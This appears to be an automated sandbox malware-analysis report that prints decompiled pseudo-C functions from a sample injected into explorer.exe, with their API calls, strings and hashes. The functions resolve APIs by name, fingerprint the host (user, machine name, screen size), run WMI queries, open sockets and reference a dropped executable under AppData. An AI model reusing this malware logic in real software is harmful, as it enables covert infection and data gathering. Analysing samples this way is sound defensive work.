Function 01503148, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 102
threadsleepUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E01503148(void* __ecx, void* __edx, void* __esi, void* __eflags, void* __fp0) {
				intOrPtr _v8;
				char _v12;
				char _v24;
				char _v28;
				void* _t10;
				intOrPtr _t13;
				int _t15;
				void* _t17;
				void* _t18;
				char _t23;
				void* _t26;
				char _t36;
				void* _t37;
				intOrPtr _t41;
				void* _t42;
				void* _t44;
				void* _t49;
				void* _t51;
				void* _t61;

				_t61 = __fp0;
				_t49 = __esi;
				_t37 = __ecx;
				while(1) {
					_t10 = E01518890(_t37,  *0x153791c, 0);
					_t57 = _t10;
					if(_t10 >= 0) {
						break;
					}
					E01514080( &_v12);
					_t13 =  *0x1537944; // 0x0
					_t41 =  *0x1537940; // 0x5dcc4e43
					_t37 = _t41 + 0x3840;
					asm("adc eax, edi");
					__eflags = _t13 - _v8;
					if(__eflags > 0) {
						L15:
						return 0;
					}
					if(__eflags < 0) {
						L4:
						_t15 = TerminateThread( *0x1537934, 0);
						__eflags = _t15;
						if(_t15 == 0) {
							break;
						}
						Sleep(0x1388);
						continue;
					}
					__eflags = _t37 - _v12;
					if(_t37 >= _v12) {
						goto L15;
					}
					goto L4;
				}
				E01514080(0x1537940);
				_t42 = _t49;
				_t17 = GetCurrentProcess();
				_t18 = GetCurrentThread();
				DuplicateHandle(GetCurrentProcess(), _t18, _t17, 0x1537934, 0, 0, 2); // executed
				E01513BA0(_t42,  &_v28, 0, 0x10);
				_t23 =  *0x1537948; // 0x195f810
				_v28 = _t23;
				if(E01515B10(_t42, _t57, 0x31) == 0) {
					_t36 = E015188F0(_t42); // executed
					_v24 = _t36;
				}
				_t26 = E01502F9E(_t42, _t61,  &_v28, E01502C4D); // executed
				_t51 = _t26;
				_pop(_t44);
				if(_t51 >= 0) {
					_push(E015088F6());
					L015216AA();
					E01515AF0(0x27, _t32);
					E01515C00(_t44, 0, "jkfkdm");
					E01507294();
				}
				if(_v24 != 0) {
					E01518A40( &_v24);
				}
				CloseHandle( *0x1537934);
				 *0x1537934 = 0;
				E015188D0( *0x153791c);
				return _t51;
			}

0x01503148
0x01503148
0x01503148
0x015031a0
0x015031a7
0x015031ae
0x015031b0
0x00000000
0x00000000
0x01503157
0x0150315c
0x01503162
0x01503168
0x0150316e
0x01503170
0x01503173
0x01503279
0x00000000
0x01503279
0x01503179
0x01503184
0x0150318b
0x01503191
0x01503193
0x00000000
0x00000000
0x0150319a
0x00000000
0x0150319a
0x0150317b
0x0150317e
0x00000000
0x00000000
0x00000000
0x0150317e
0x015031b8
0x015031c3
0x015031cd
0x015031d0
0x015031da
0x015031e7
0x015031ec
0x015031f3
0x01503200
0x01503202
0x01503207
0x01503207
0x01503213
0x01503218
0x0150321b
0x0150321e
0x01503225
0x01503226
0x0150322e
0x01503239
0x01503241
0x01503241
0x01503249
0x0150324f
0x01503254
0x0150325b
0x01503267
0x0150326d
0x00000000

APIs

Part of subcall function 01518890: WaitForSingleObject.KERNEL32(?,?,?,?,01506F8C,?,00003A98), ref: 0151889C

TerminateThread.KERNEL32(00000000), ref: 0150318B
Sleep.KERNEL32(00001388), ref: 0150319A
GetCurrentProcess.KERNEL32(01537934,00000000,00000000,00000002), ref: 015031CD
GetCurrentThread.KERNEL32(00000000), ref: 015031D0
GetCurrentProcess.KERNEL32(00000000), ref: 015031D7
DuplicateHandle.KERNEL32(00000000), ref: 015031DA
#12.WS2_32(00000000), ref: 01503226
CloseHandle.KERNEL32 ref: 0150325B

Strings

jkfkdm, xrefs: 01503233

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: Current$HandleProcessThread$CloseDuplicateObjectSingleSleepTerminateWait
String ID: jkfkdm
API String ID: 1023608493-2652042395
Opcode ID: fc0e0a4a73df5843424dd00292a5f02d7b6e204e5fc9276aa0eee0663ae80ce3
Instruction ID: 3d50d9464bc7a7fdd73c9d546f4edb43e826bdd3fdab6b82eae2e3fd061afa28
Opcode Fuzzy Hash: fc0e0a4a73df5843424dd00292a5f02d7b6e204e5fc9276aa0eee0663ae80ce3
Instruction Fuzzy Hash: CB31A1B3D00207AEEB22ABE5AD4AD6F3B68FBC9710B110455E6119F188EB749504E7A0

Uniqueness

Uniqueness Score: 100.00%

Function 01524390, Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 91
libraryloaderUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 24%

			E01524390(signed int* _a4) {
				char _v8;
				signed char _v9;
				signed char _v10;
				signed int _v12;
				_Unknown_base(*)()* _v16;
				_Unknown_base(*)()* _t14;
				void* _t20;
				intOrPtr* _t30;
				struct HINSTANCE__* _t50;
				intOrPtr* _t51;

				_v8 = 0;
				_t50 = GetModuleHandleA("advapi32.dll");
				if(_t50 != 0) {
					_t14 = GetProcAddress(_t50, "CryptAcquireContextA");
					_v16 = _t14;
					if(_t14 != 0) {
						_t30 = GetProcAddress(_t50, "CryptGenRandom");
						if(_t30 == 0) {
							L8:
							return 1;
						} else {
							_t51 = GetProcAddress(_t50, "CryptReleaseContext");
							if(_t51 == 0) {
								goto L8;
							} else {
								_push(0xf0000000);
								_push(1);
								_push(0);
								_push(0);
								_push( &_v8); // executed
								if(_v16() == 0) {
									goto L8;
								} else {
									_t20 =  *_t30(_v8, 4,  &_v12);
									 *_t51(_v8, 0);
									if(_t20 != 0) {
										 *_a4 = (((_v12 & 0x000000ff) << 0x00000008 | _v12 & 0x000000ff) << 0x00000008 | _v10 & 0x000000ff) << 0x00000008 | _v9 & 0x000000ff;
										return 0;
									} else {
										goto L8;
									}
								}
							}
						}
					} else {
						return 1;
					}
				} else {
					_t2 =  &(_t50->i); // 0x1
					return _t2;
				}
			}

0x0152439c
0x015243a9
0x015243ad
0x015243c4
0x015243c6
0x015243cb
0x015243e1
0x015243e5
0x01524425
0x01524430
0x015243e7
0x015243ef
0x015243f3
0x00000000
0x015243f5
0x015243f5
0x015243fa
0x015243fc
0x015243fe
0x01524403
0x01524409
0x00000000
0x0152440b
0x01524415
0x0152441f
0x01524423
0x01524456
0x0152445e
0x00000000
0x00000000
0x00000000
0x01524423
0x01524409
0x015243f3
0x015243cd
0x015243d7
0x015243d7
0x015243af
0x015243af
0x015243b6
0x015243b6

APIs

GetModuleHandleA.KERNEL32(advapi32.dll,01521870,?,01521870), ref: 015243A3
GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,readrr956964,?,01521870), ref: 015243C4

Strings

CryptGenRandom, xrefs: 015243D9
readrr956964, xrefs: 015243B7
CryptAcquireContextA, xrefs: 015243BE
CryptReleaseContext, xrefs: 015243E7
advapi32.dll, xrefs: 01524397

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll$readrr956964
API String ID: 1646373207-701622202
Opcode ID: fb8ebe63c1c41797aef4a8ec5d15230257f04bc02d3d9c199e9325084ba0fc61
Instruction ID: 79e8a4eb156b95a91837be4c99d64a91128eabe18e78735fda26e419fb881744
Opcode Fuzzy Hash: fb8ebe63c1c41797aef4a8ec5d15230257f04bc02d3d9c199e9325084ba0fc61
Instruction Fuzzy Hash: CD212933A4022867DB25DAAD9C45BEDBBECEF95611F00419BF904EB2C0DAB4DA0047A0

Uniqueness

Uniqueness Score: 100.00%

Function 003F9FB0, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 47
libraryloaderUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 37%

			E003F9FB0() {
				intOrPtr _t2;
				struct HINSTANCE__* _t7;
				void* _t12;
				void* _t13;

				_t2 = E003F74B0(GetCurrentProcess()); // executed
				_t13 = _t12 + 4;
				 *0x40f864 = _t2;
				while(0 != 0) {
				}
				 *0x41150c = GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
				__eflags = GetModuleFileNameW(0, "C:\Windows\explorer.exe", 0x105);
				if(__eflags != 0) {
					_t7 = E003F4730(__eflags, "C:\Windows\explorer.exe", 0x5c);
					_t13 = _t13 + 8;
					 *0x4113c4 = _t7;
				} else {
					while(1) {
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					 *0x4113c4 = 0;
				}
				 *0x40fd7c = E003F4730(__eflags, "C:\Users\Luke\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe", 0x5c);
				E003F4120(0, 0x40f760, 0, 0x9c);
				0x40f760->dwOSVersionInfoSize = 0x9c;
				return GetVersionExA(0x40f760);
			}

0x003f9fba
0x003f9fbf
0x003f9fc2
0x003f9fc7
0x003f9fcb
0x003f9fe4
0x003f9ffb
0x003f9ffd
0x003fa018
0x003fa01d
0x003fa020
0x003f9fff
0x003f9fff
0x003f9fff
0x003fa001
0x00000000
0x00000000
0x003fa003
0x003fa005
0x003fa005
0x003fa034
0x003fa045
0x003fa04d
0x003fa063

APIs

GetCurrentProcess.KERNEL32(?,003F2A9C), ref: 003F9FB3

Part of subcall function 003F74B0: OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 003F74DC

GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,003F2A9C), ref: 003F9FD7
GetProcAddress.KERNEL32(00000000), ref: 003F9FDE
GetModuleFileNameW.KERNEL32(00000000,C:\Windows\explorer.exe,00000105), ref: 003F9FF5
GetVersionExA.KERNEL32(0040F760), ref: 003FA05C

Part of subcall function 003F4730: _wcschr.LIBCMTD ref: 003F474C

Strings

C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe, xrefs: 003FA027
kernel32, xrefs: 003F9FD2
IsWow64Process, xrefs: 003F9FCD
C:\Windows\explorer.exe, xrefs: 003F9FEE, 003FA013

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID: ModuleProcess$AddressCurrentFileHandleNameOpenProcTokenVersion_wcschr
String ID: C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe$C:\Windows\explorer.exe$IsWow64Process$kernel32
API String ID: 380517091-2121607997
Opcode ID: 4bcb83329d5c1e089ae260a324d57be35389577732da529fb74a8cd1e93adda3
Instruction ID: 31179d061316295c8f25fd62325984caf77b78bec3ae7110d26aa6d8b97f572f
Opcode Fuzzy Hash: 4bcb83329d5c1e089ae260a324d57be35389577732da529fb74a8cd1e93adda3
Instruction Fuzzy Hash: BD0125B1A40708AEE7117F707E0AF7A3A64A704B06F144037F705F95E1EAB454044E1E

Uniqueness

Uniqueness Score: 100.00%

Function 0150F062, Relevance: 15.0, APIs: 2, Strings: 8, Instructions: 50
stringUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 65%

			E0150F062(void* __esi, char* _a4) {
				void* _t7;
				void* _t8;
				signed int _t10;
				void* _t12;
				char* _t16;

				if("YNNNNNN" == 0x59) {
					L6:
					__eflags = 0;
					return 0;
				} else {
					_t16 = "YNNNNNN";
					strncpy(_t16, "YNNNNNN", 0x1f);
					if(strncmp(_t16, _a4, 0x1f) == 0) {
						E01512139(__eflags);
						_t7 = E01510BDC("YNNN"); // executed
						__eflags = _t7;
						if(_t7 >= 0) {
							goto L6;
						} else {
							_push("crypto\\pubkey\\pubkey.c");
							_push("psError %s");
							_t8 = E01510CBC(_t7);
							_push(0x3d);
							_push(":%d ");
							E01510CBC(_t8);
							_t10 = E01510B84("pscore open failure\n");
							goto L3;
						}
					} else {
						_push("crypto\\pubkey\\pubkey.c");
						_push("psError %s");
						_t12 = E01510CBC(_t5);
						_push(0x38);
						_push(":%d ");
						E01510CBC(_t12);
						_t10 = E01510B9E("Crypto config mismatch.\nLibrary: YNNNNNN\nCurrent: %s\n", _a4);
						L3:
						return _t10 | 0xffffffff;
					}
				}
			}

0x0150f06c
0x0150f106
0x0150f106
0x0150f109
0x0150f072
0x0150f07a
0x0150f080
0x0150f096
0x0150f0c8
0x0150f0d2
0x0150f0d8
0x0150f0da
0x00000000
0x0150f0dc
0x0150f0dc
0x0150f0e1
0x0150f0e6
0x0150f0eb
0x0150f0ed
0x0150f0f2
0x0150f0fc
0x00000000
0x0150f101
0x0150f098
0x0150f098
0x0150f09d
0x0150f0a2
0x0150f0a7
0x0150f0a9
0x0150f0ae
0x0150f0bb
0x0150f0c3
0x0150f0c7
0x0150f0c7
0x0150f096

APIs

strncpy.MSVCRT(YNNNNNN,YNNNNNN,0000001F,?,?,0150EB06,YNNNNNN,?,?,015063A7,0152A554), ref: 0150F080
strncmp.MSVCRT(YNNNNNN,?,0000001F,YNNNNNN,YNNNNNN,0000001F,?,?,0150EB06,YNNNNNN,?,?,015063A7,0152A554), ref: 0150F08B

Strings

crypto\pubkey\pubkey.c, xrefs: 0150F098, 0150F0DC
psError %s, xrefs: 0150F09D, 0150F0E1
pscore open failure, xrefs: 0150F0F7
Crypto config mismatch.Library: YNNNNNNCurrent: %s, xrefs: 0150F0B6
YNNNNNN, xrefs: 0150F07A, 0150F07F, 0150F08A
YNNNNNN, xrefs: 0150F075
YNNN, xrefs: 0150F0CD
:%d , xrefs: 0150F0A9, 0150F0ED

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: strncmpstrncpy
String ID: :%d $Crypto config mismatch.Library: YNNNNNNCurrent: %s$YNNN$YNNNNNN$YNNNNNN$crypto\pubkey\pubkey.c$psError %s$pscore open failure
API String ID: 2502451431-802812750
Opcode ID: fe3317a439a8e53e2ee924464be6323dded0288c2dee8fc2a3777235698adaa3
Instruction ID: 87f3e346499666fce682b9ba121e3e5e93d612aa473bd178fd147a68b3e5b945
Opcode Fuzzy Hash: fe3317a439a8e53e2ee924464be6323dded0288c2dee8fc2a3777235698adaa3
Instruction Fuzzy Hash: 14018B3BBC172B35F52337AA8D82F5E29447BE3998F014019FA092E5C6EAC0415145E5

Uniqueness

Uniqueness Score: 100.00%

Function 015161E0, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 76
UNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#23.WS2_32(00000002,00000001,00000006), ref: 015161FA
#10.WS2_32(000000FF,8004667E,00000001), ref: 01516224
#111.WS2_32 ref: 0151622E
#9.WS2_32(?), ref: 01516264
#4.WS2_32(000000FF,00000000,00000010), ref: 0151627E
#111.WS2_32 ref: 01516289
#3.WS2_32(000000FF), ref: 0151629F

Strings

3', xrefs: 01516292

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: #111
String ID: 3'
API String ID: 568940515-280543908
Opcode ID: cfd2fd1250695d2f6aa925bf147ceb71c2a680d38ccfc52963ef7082e9100797
Instruction ID: 48c68e241d22ecb1ab623dd4fb34571345fb869e2e9bfc10cd84938d2113a842
Opcode Fuzzy Hash: cfd2fd1250695d2f6aa925bf147ceb71c2a680d38ccfc52963ef7082e9100797
Instruction Fuzzy Hash: FA318F7590421ADBEB31DFA4D9487FE77B4BB05321F100A18F931AB2C8D7B48654DB62

Uniqueness

Uniqueness Score: 100.00%

Function 003F68D0, Relevance: 13.6, APIs: 4, Strings: 5, Instructions: 61
stringUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 37%

			E003F68D0(void* __ecx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t18;

				_t31 = __ecx;
				_v12 = 0;
				_t18 = E003F3EE0(__ecx, _a4 + 0x33b); // executed
				_v8 = _t18;
				if(_v8 != 0) {
					strncpy(_v8 + 0x242, "ntdll.dll", 0xc);
					E003F4BD0(_t31, "kernel32.dll", _v8 + 0x228, 0x1a);
					strncpy(_v8 + 0x25a, "LoadLibraryA", 0x20);
					strncpy(_v8 + 0x282, "GetProcAddress", 0x20);
					strncpy(_v8 + 0x2aa, "GetModuleHandleA", 0x20);
					 *((intOrPtr*)(_v8 + 0x24e)) = _a4;
					 *((intOrPtr*)(_v8 + 0x2fb)) = 0xe291a0f3;
					return _v8;
				}
				while(0 != 0) {
				}
				return 0;
			}

0x003f68d0
0x003f68d6
0x003f68e6
0x003f68ee
0x003f68f5
0x003f6915
0x003f692d
0x003f6946
0x003f695f
0x003f6977
0x003f6985
0x003f698e
0x00000000
0x003f6998
0x003f68f7
0x003f68fb
0x00000000

APIs

Part of subcall function 003F3EE0: HeapAlloc.KERNEL32(015A0000,00000008,00405340,?,?,003F3F90,003F7DD5,?,?,003F7DD6,00405340,00000839), ref: 003F3EF1

strncpy.MSVCRT(-00000242,ntdll.dll,0000000C), ref: 003F6915
strncpy.MSVCRT(-0000025A,LoadLibraryA,00000020), ref: 003F6946
strncpy.MSVCRT(-00000282,GetProcAddress,00000020), ref: 003F695F
strncpy.MSVCRT(-000002AA,GetModuleHandleA,00000020), ref: 003F6977

Strings

GetModuleHandleA, xrefs: 003F6969
LoadLibraryA, xrefs: 003F6937
GetProcAddress, xrefs: 003F6950
ntdll.dll, xrefs: 003F6906
kernel32.dll, xrefs: 003F6928

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID: strncpy$AllocHeap
String ID: GetModuleHandleA$GetProcAddress$LoadLibraryA$kernel32.dll$ntdll.dll
API String ID: 1366602760-3132565846
Opcode ID: 2199168b9690a48f008a3e5c17dd802110338819d0a259ecc3ef37ee7d6a8cd9
Instruction ID: 45129fb8afb8f892cec062ce341e038b8a4280aeaa48398c8c659b78f419a880
Opcode Fuzzy Hash: 2199168b9690a48f008a3e5c17dd802110338819d0a259ecc3ef37ee7d6a8cd9
Instruction Fuzzy Hash: 21118E74A40308FBDB00EB54DC47B6E7764EF44708F6445B9FA047B2C2D6799F109A8A

Uniqueness

Uniqueness Score: 100.00%

Function 0150EA96, Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 55
stringUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 57%

			E0150EA96(void* __esi, char* _a4) {
				int _t5;
				void* _t6;
				void* _t9;
				signed int _t11;
				void* _t13;
				void* _t15;
				char* _t17;
				void* _t18;

				if( *"YN" == 0x59) {
					L7:
					return 0;
				} else {
					_push(__esi);
					_t17 = "YN";
					strncpy(_t17, "YN", 0x1f);
					_t5 = strncmp(_t17, _a4, 0x1f);
					_pop(_t18);
					if(_t5 == 0) {
						_t6 = E0150F062(_t18, "YNNNNNN"); // executed
						_pop(_t15);
						if(_t6 >= 0) {
							memset(0x1537a30, 0, 0xe00);
							E0150EA04(_t15);
							goto L7;
						} else {
							_push("matrixssl\\matrixssl.c");
							_push("psError %s");
							_t9 = E01510CBC(_t6);
							_push(0x69);
							_push(":%d ");
							E01510CBC(_t9);
							_t11 = E01510B84("pscrypto open failure\n");
							goto L3;
						}
					} else {
						_push("matrixssl\\matrixssl.c");
						_push("psError %s");
						_t13 = E01510CBC(_t5);
						_push(0x65);
						_push(":%d ");
						E01510CBC(_t13);
						_t11 = E01510B9E("MatrixSSL config mismatch.\nLibrary: YN\nCurrent: %s\n", _a4);
						L3:
						return _t11 | 0xffffffff;
					}
				}
			}

0x0150eaa0
0x0150eb4e
0x0150eb51
0x0150eaa6
0x0150eaa6
0x0150eaae
0x0150eab4
0x0150eabf
0x0150eac7
0x0150eaca
0x0150eb01
0x0150eb06
0x0150eb09
0x0150eb41
0x0150eb49
0x00000000
0x0150eb0b
0x0150eb0b
0x0150eb10
0x0150eb15
0x0150eb1a
0x0150eb1c
0x0150eb21
0x0150eb2b
0x00000000
0x0150eb30
0x0150eacc
0x0150eacc
0x0150ead1
0x0150ead6
0x0150eadb
0x0150eadd
0x0150eae2
0x0150eaef
0x0150eaf7
0x0150eafb
0x0150eafb
0x0150eaca

APIs

strncpy.MSVCRT(01536194,0152A554,0000001F,?,?,015063A7,0152A554), ref: 0150EAB4
strncmp.MSVCRT(01536194,0152A554,0000001F,01536194,0152A554,0000001F,?,?,015063A7,0152A554), ref: 0150EABF
memset.MSVCRT(01537A30,00000000,00000E00,?,?,015063A7,0152A554), ref: 0150EB41

Strings

pscrypto open failure, xrefs: 0150EB26
psError %s, xrefs: 0150EAD1, 0150EB10
matrixssl\matrixssl.c, xrefs: 0150EACC, 0150EB0B
MatrixSSL config mismatch.Library: YNCurrent: %s, xrefs: 0150EAEA
YNNNNNN, xrefs: 0150EAFC
:%d , xrefs: 0150EADD, 0150EB1C

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: memsetstrncmpstrncpy
String ID: :%d $MatrixSSL config mismatch.Library: YNCurrent: %s$YNNNNNN$matrixssl\matrixssl.c$psError %s$pscrypto open failure
API String ID: 1801657993-1857734608
Opcode ID: e594a33b2692540068396cd303d97a72f81aa49658b464f2339a2d052e0252e7
Instruction ID: e42433cd438e135e06c6afab48932c2b33771f6fca28f29f804786ce6da53ae5
Opcode Fuzzy Hash: e594a33b2692540068396cd303d97a72f81aa49658b464f2339a2d052e0252e7
Instruction Fuzzy Hash: 2501846368172B31F92333EA5D87F5F2A45BBA6A64F140428FA092E9C6F9D1419214F2

Uniqueness

Uniqueness Score: 100.00%

Function 015188F0, Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 98
UNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 50%

			E015188F0(void* __ecx) {
				intOrPtr _v8;
				int _v12;
				int _t40;
				intOrPtr _t41;
				intOrPtr _t43;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				void* _t58;
				intOrPtr _t65;
				intOrPtr _t79;
				intOrPtr _t80;
				void* _t84;
				void* _t85;
				void* _t86;

				_v12 = 0;
				_t40 = E01513960(__ecx, 0x88);
				_t85 = _t84 + 4;
				_v12 = _t40;
				if(_v12 != 0) {
					_t41 = E01515B10(__ecx, __eflags, 0xb);
					_t86 = _t85 + 4;
					_v8 = _t41;
					__eflags = _v8;
					if(__eflags != 0) {
						_t58 = E01513E60(__eflags, _v8);
						_t86 = _t86 + 4;
						 *_v12 = _t58;
					}
					__eflags = _v12 + 4;
					E0151FA90(_v12 + 4, 0x40);
					_t43 = E01521140(); // executed
					 *((intOrPtr*)(_v12 + 0x44)) = _t43;
					while(1) {
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					 *((intOrPtr*)(_v12 + 0x48)) = E01516C90("562258");
					while(1) {
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					 *((intOrPtr*)(_v12 + 0x4c)) = E01516C90("LUKE-PC");
					while(1) {
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					 *((intOrPtr*)(_v12 + 0x50)) = E01516C90("Luke");
					while(1) {
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					_t65 =  *0x1538ea8; // 0x2
					 *((intOrPtr*)(_v12 + 0x54)) = _t65;
					_t79 = ( *0x1538b3c & 0x0000ffff) + 1;
					__eflags = _t79;
					 *((intOrPtr*)(_v12 + 0x58)) = _t79;
					_t80 =  *0x153a748; // 0x0
					 *((intOrPtr*)(_v12 + 0x5c)) = _t80;
					_t49 = E015211D0(); // executed
					 *((intOrPtr*)(_v12 + 0x60)) = _t49;
					_t50 = E01521260(); // executed
					 *((intOrPtr*)(_v12 + 0x64)) = _t50;
					 *((intOrPtr*)(_v12 + 0x68)) = GetSystemMetrics(0);
					 *((intOrPtr*)(_v12 + 0x6c)) = GetSystemMetrics(1);
					_t53 = E01518CD0(_v12); // executed
					 *((intOrPtr*)(_v12 + 0x70)) = _t53;
					 *((intOrPtr*)(_v12 + 0x74)) = E01518DA0();
					 *((intOrPtr*)(_v12 + 0x80)) = 0x1538eb0;
					 *((intOrPtr*)(_v12 + 0x84)) = 0x153a4f8;
					return _v12;
				}
				return 0;
			}

0x015188f6
0x01518902
0x01518907
0x0151890a
0x01518911
0x0151891c
0x01518921
0x01518924
0x01518927
0x0151892b
0x01518931
0x01518936
0x0151893c
0x0151893c
0x01518943
0x01518947
0x0151894f
0x01518957
0x0151895a
0x0151895a
0x0151895c
0x00000000
0x00000000
0x0151895e
0x01518970
0x01518973
0x01518973
0x01518975
0x00000000
0x00000000
0x01518977
0x01518989
0x0151898c
0x0151898c
0x0151898e
0x00000000
0x00000000
0x01518990
0x015189a2
0x015189a5
0x015189a5
0x015189a7
0x00000000
0x00000000
0x015189a9
0x015189ae
0x015189b4
0x015189be
0x015189be
0x015189c4
0x015189ca
0x015189d0
0x015189d3
0x015189db
0x015189de
0x015189e6
0x015189f4
0x01518a02
0x01518a05
0x01518a0d
0x01518a18
0x01518a1e
0x01518a2b
0x00000000
0x01518a35
0x00000000

APIs

Part of subcall function 01513960: HeapAlloc.KERNEL32(018E0000,00000008,0152C2F8,?,?,01513A10,015150C5,?,?,015150C6,0152C2F8,00000839), ref: 01513971

GetSystemMetrics.USER32(00000000), ref: 015189EB
GetSystemMetrics.USER32(00000001), ref: 015189F9

Strings

Luke, xrefs: 01518992
562258, xrefs: 01518960
C:\Windows\explorer.exe, xrefs: 01518A2B
LUKE-PC, xrefs: 01518979
C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe, xrefs: 01518A1E

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: MetricsSystem$AllocHeap
String ID: 562258$C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe$C:\Windows\explorer.exe$user-PC$user
API String ID: 1545573275-3498347166
Opcode ID: eaf4cf6f6ea27d27e12e7bc6ab131966c2b9ae62b8b814549b4febbea1401457
Instruction ID: da57cd8c4a8acccb50210f8a19824a8c1f1ef259b8dc19e732b22fed5cbef62f
Opcode Fuzzy Hash: eaf4cf6f6ea27d27e12e7bc6ab131966c2b9ae62b8b814549b4febbea1401457
Instruction Fuzzy Hash: 0D419FB4E0030AEFEB15EFA4D444A5DBBB2FF94314F1480A9D8416F349EB359985CB42

Uniqueness

Uniqueness Score: 100.00%

Function 01521040, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90
UNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 31%

			E01521040(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				void* _v28;
				void* _v32;
				char _v36;
				intOrPtr _t41;
				intOrPtr _t44;
				intOrPtr _t49;

				_v20 = 0;
				_t41 = _a8;
				__imp__#2(_t41);
				_v12 = _t41;
				__imp__#2(_a12);
				_v16 = _t41;
				__imp__#2(L"WQL");
				_v8 = _t41;
				_t44 =  *((intOrPtr*)( *((intOrPtr*)( *_a4 + 0x50))))(_a4, _v8, _v12, 0, 0,  &_v28); // executed
				_v24 = _t44;
				if(_v24 == 0) {
					_v32 = 0;
					_t49 =  *((intOrPtr*)( *((intOrPtr*)( *_v28 + 0x10))))(_v28, 0x2710, 1,  &_v32,  &_v36); // executed
					_v24 = _t49;
					if(_v24 == 0) {
						_v24 =  *((intOrPtr*)( *((intOrPtr*)( *_v32 + 0x10))))(_v32, _v16, 0, _a16, 0, 0);
						if(_v24 == 0) {
							_v20 = 1;
						}
						 *((intOrPtr*)( *((intOrPtr*)( *_v32 + 8))))(_v32);
					}
					 *((intOrPtr*)( *((intOrPtr*)( *_v28 + 8))))(_v28);
				}
				__imp__#6(_v12);
				__imp__#6(_v16);
				__imp__#6(_v8);
				return _v20;
			}

0x01521046
0x0152104d
0x01521051
0x01521057
0x0152105e
0x01521064
0x0152106c
0x01521072
0x01521091
0x01521093
0x0152109a
0x0152109c
0x015210be
0x015210c0
0x015210c7
0x015210e5
0x015210ec
0x015210ee
0x015210ee
0x01521101
0x01521101
0x0152110f
0x0152110f
0x01521115
0x0152111f
0x01521129
0x01521135

APIs

#2.OLEAUT32(?,?,?,?,01521180), ref: 01521051
#2.OLEAUT32(00000000,?,?,?,01521180), ref: 0152105E
#2.OLEAUT32(WQL,?,?,?,01521180), ref: 0152106C
#6.OLEAUT32(?), ref: 01521115
#6.OLEAUT32(?), ref: 0152111F
#6.OLEAUT32(?), ref: 01521129

Strings

WQL, xrefs: 01521067

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

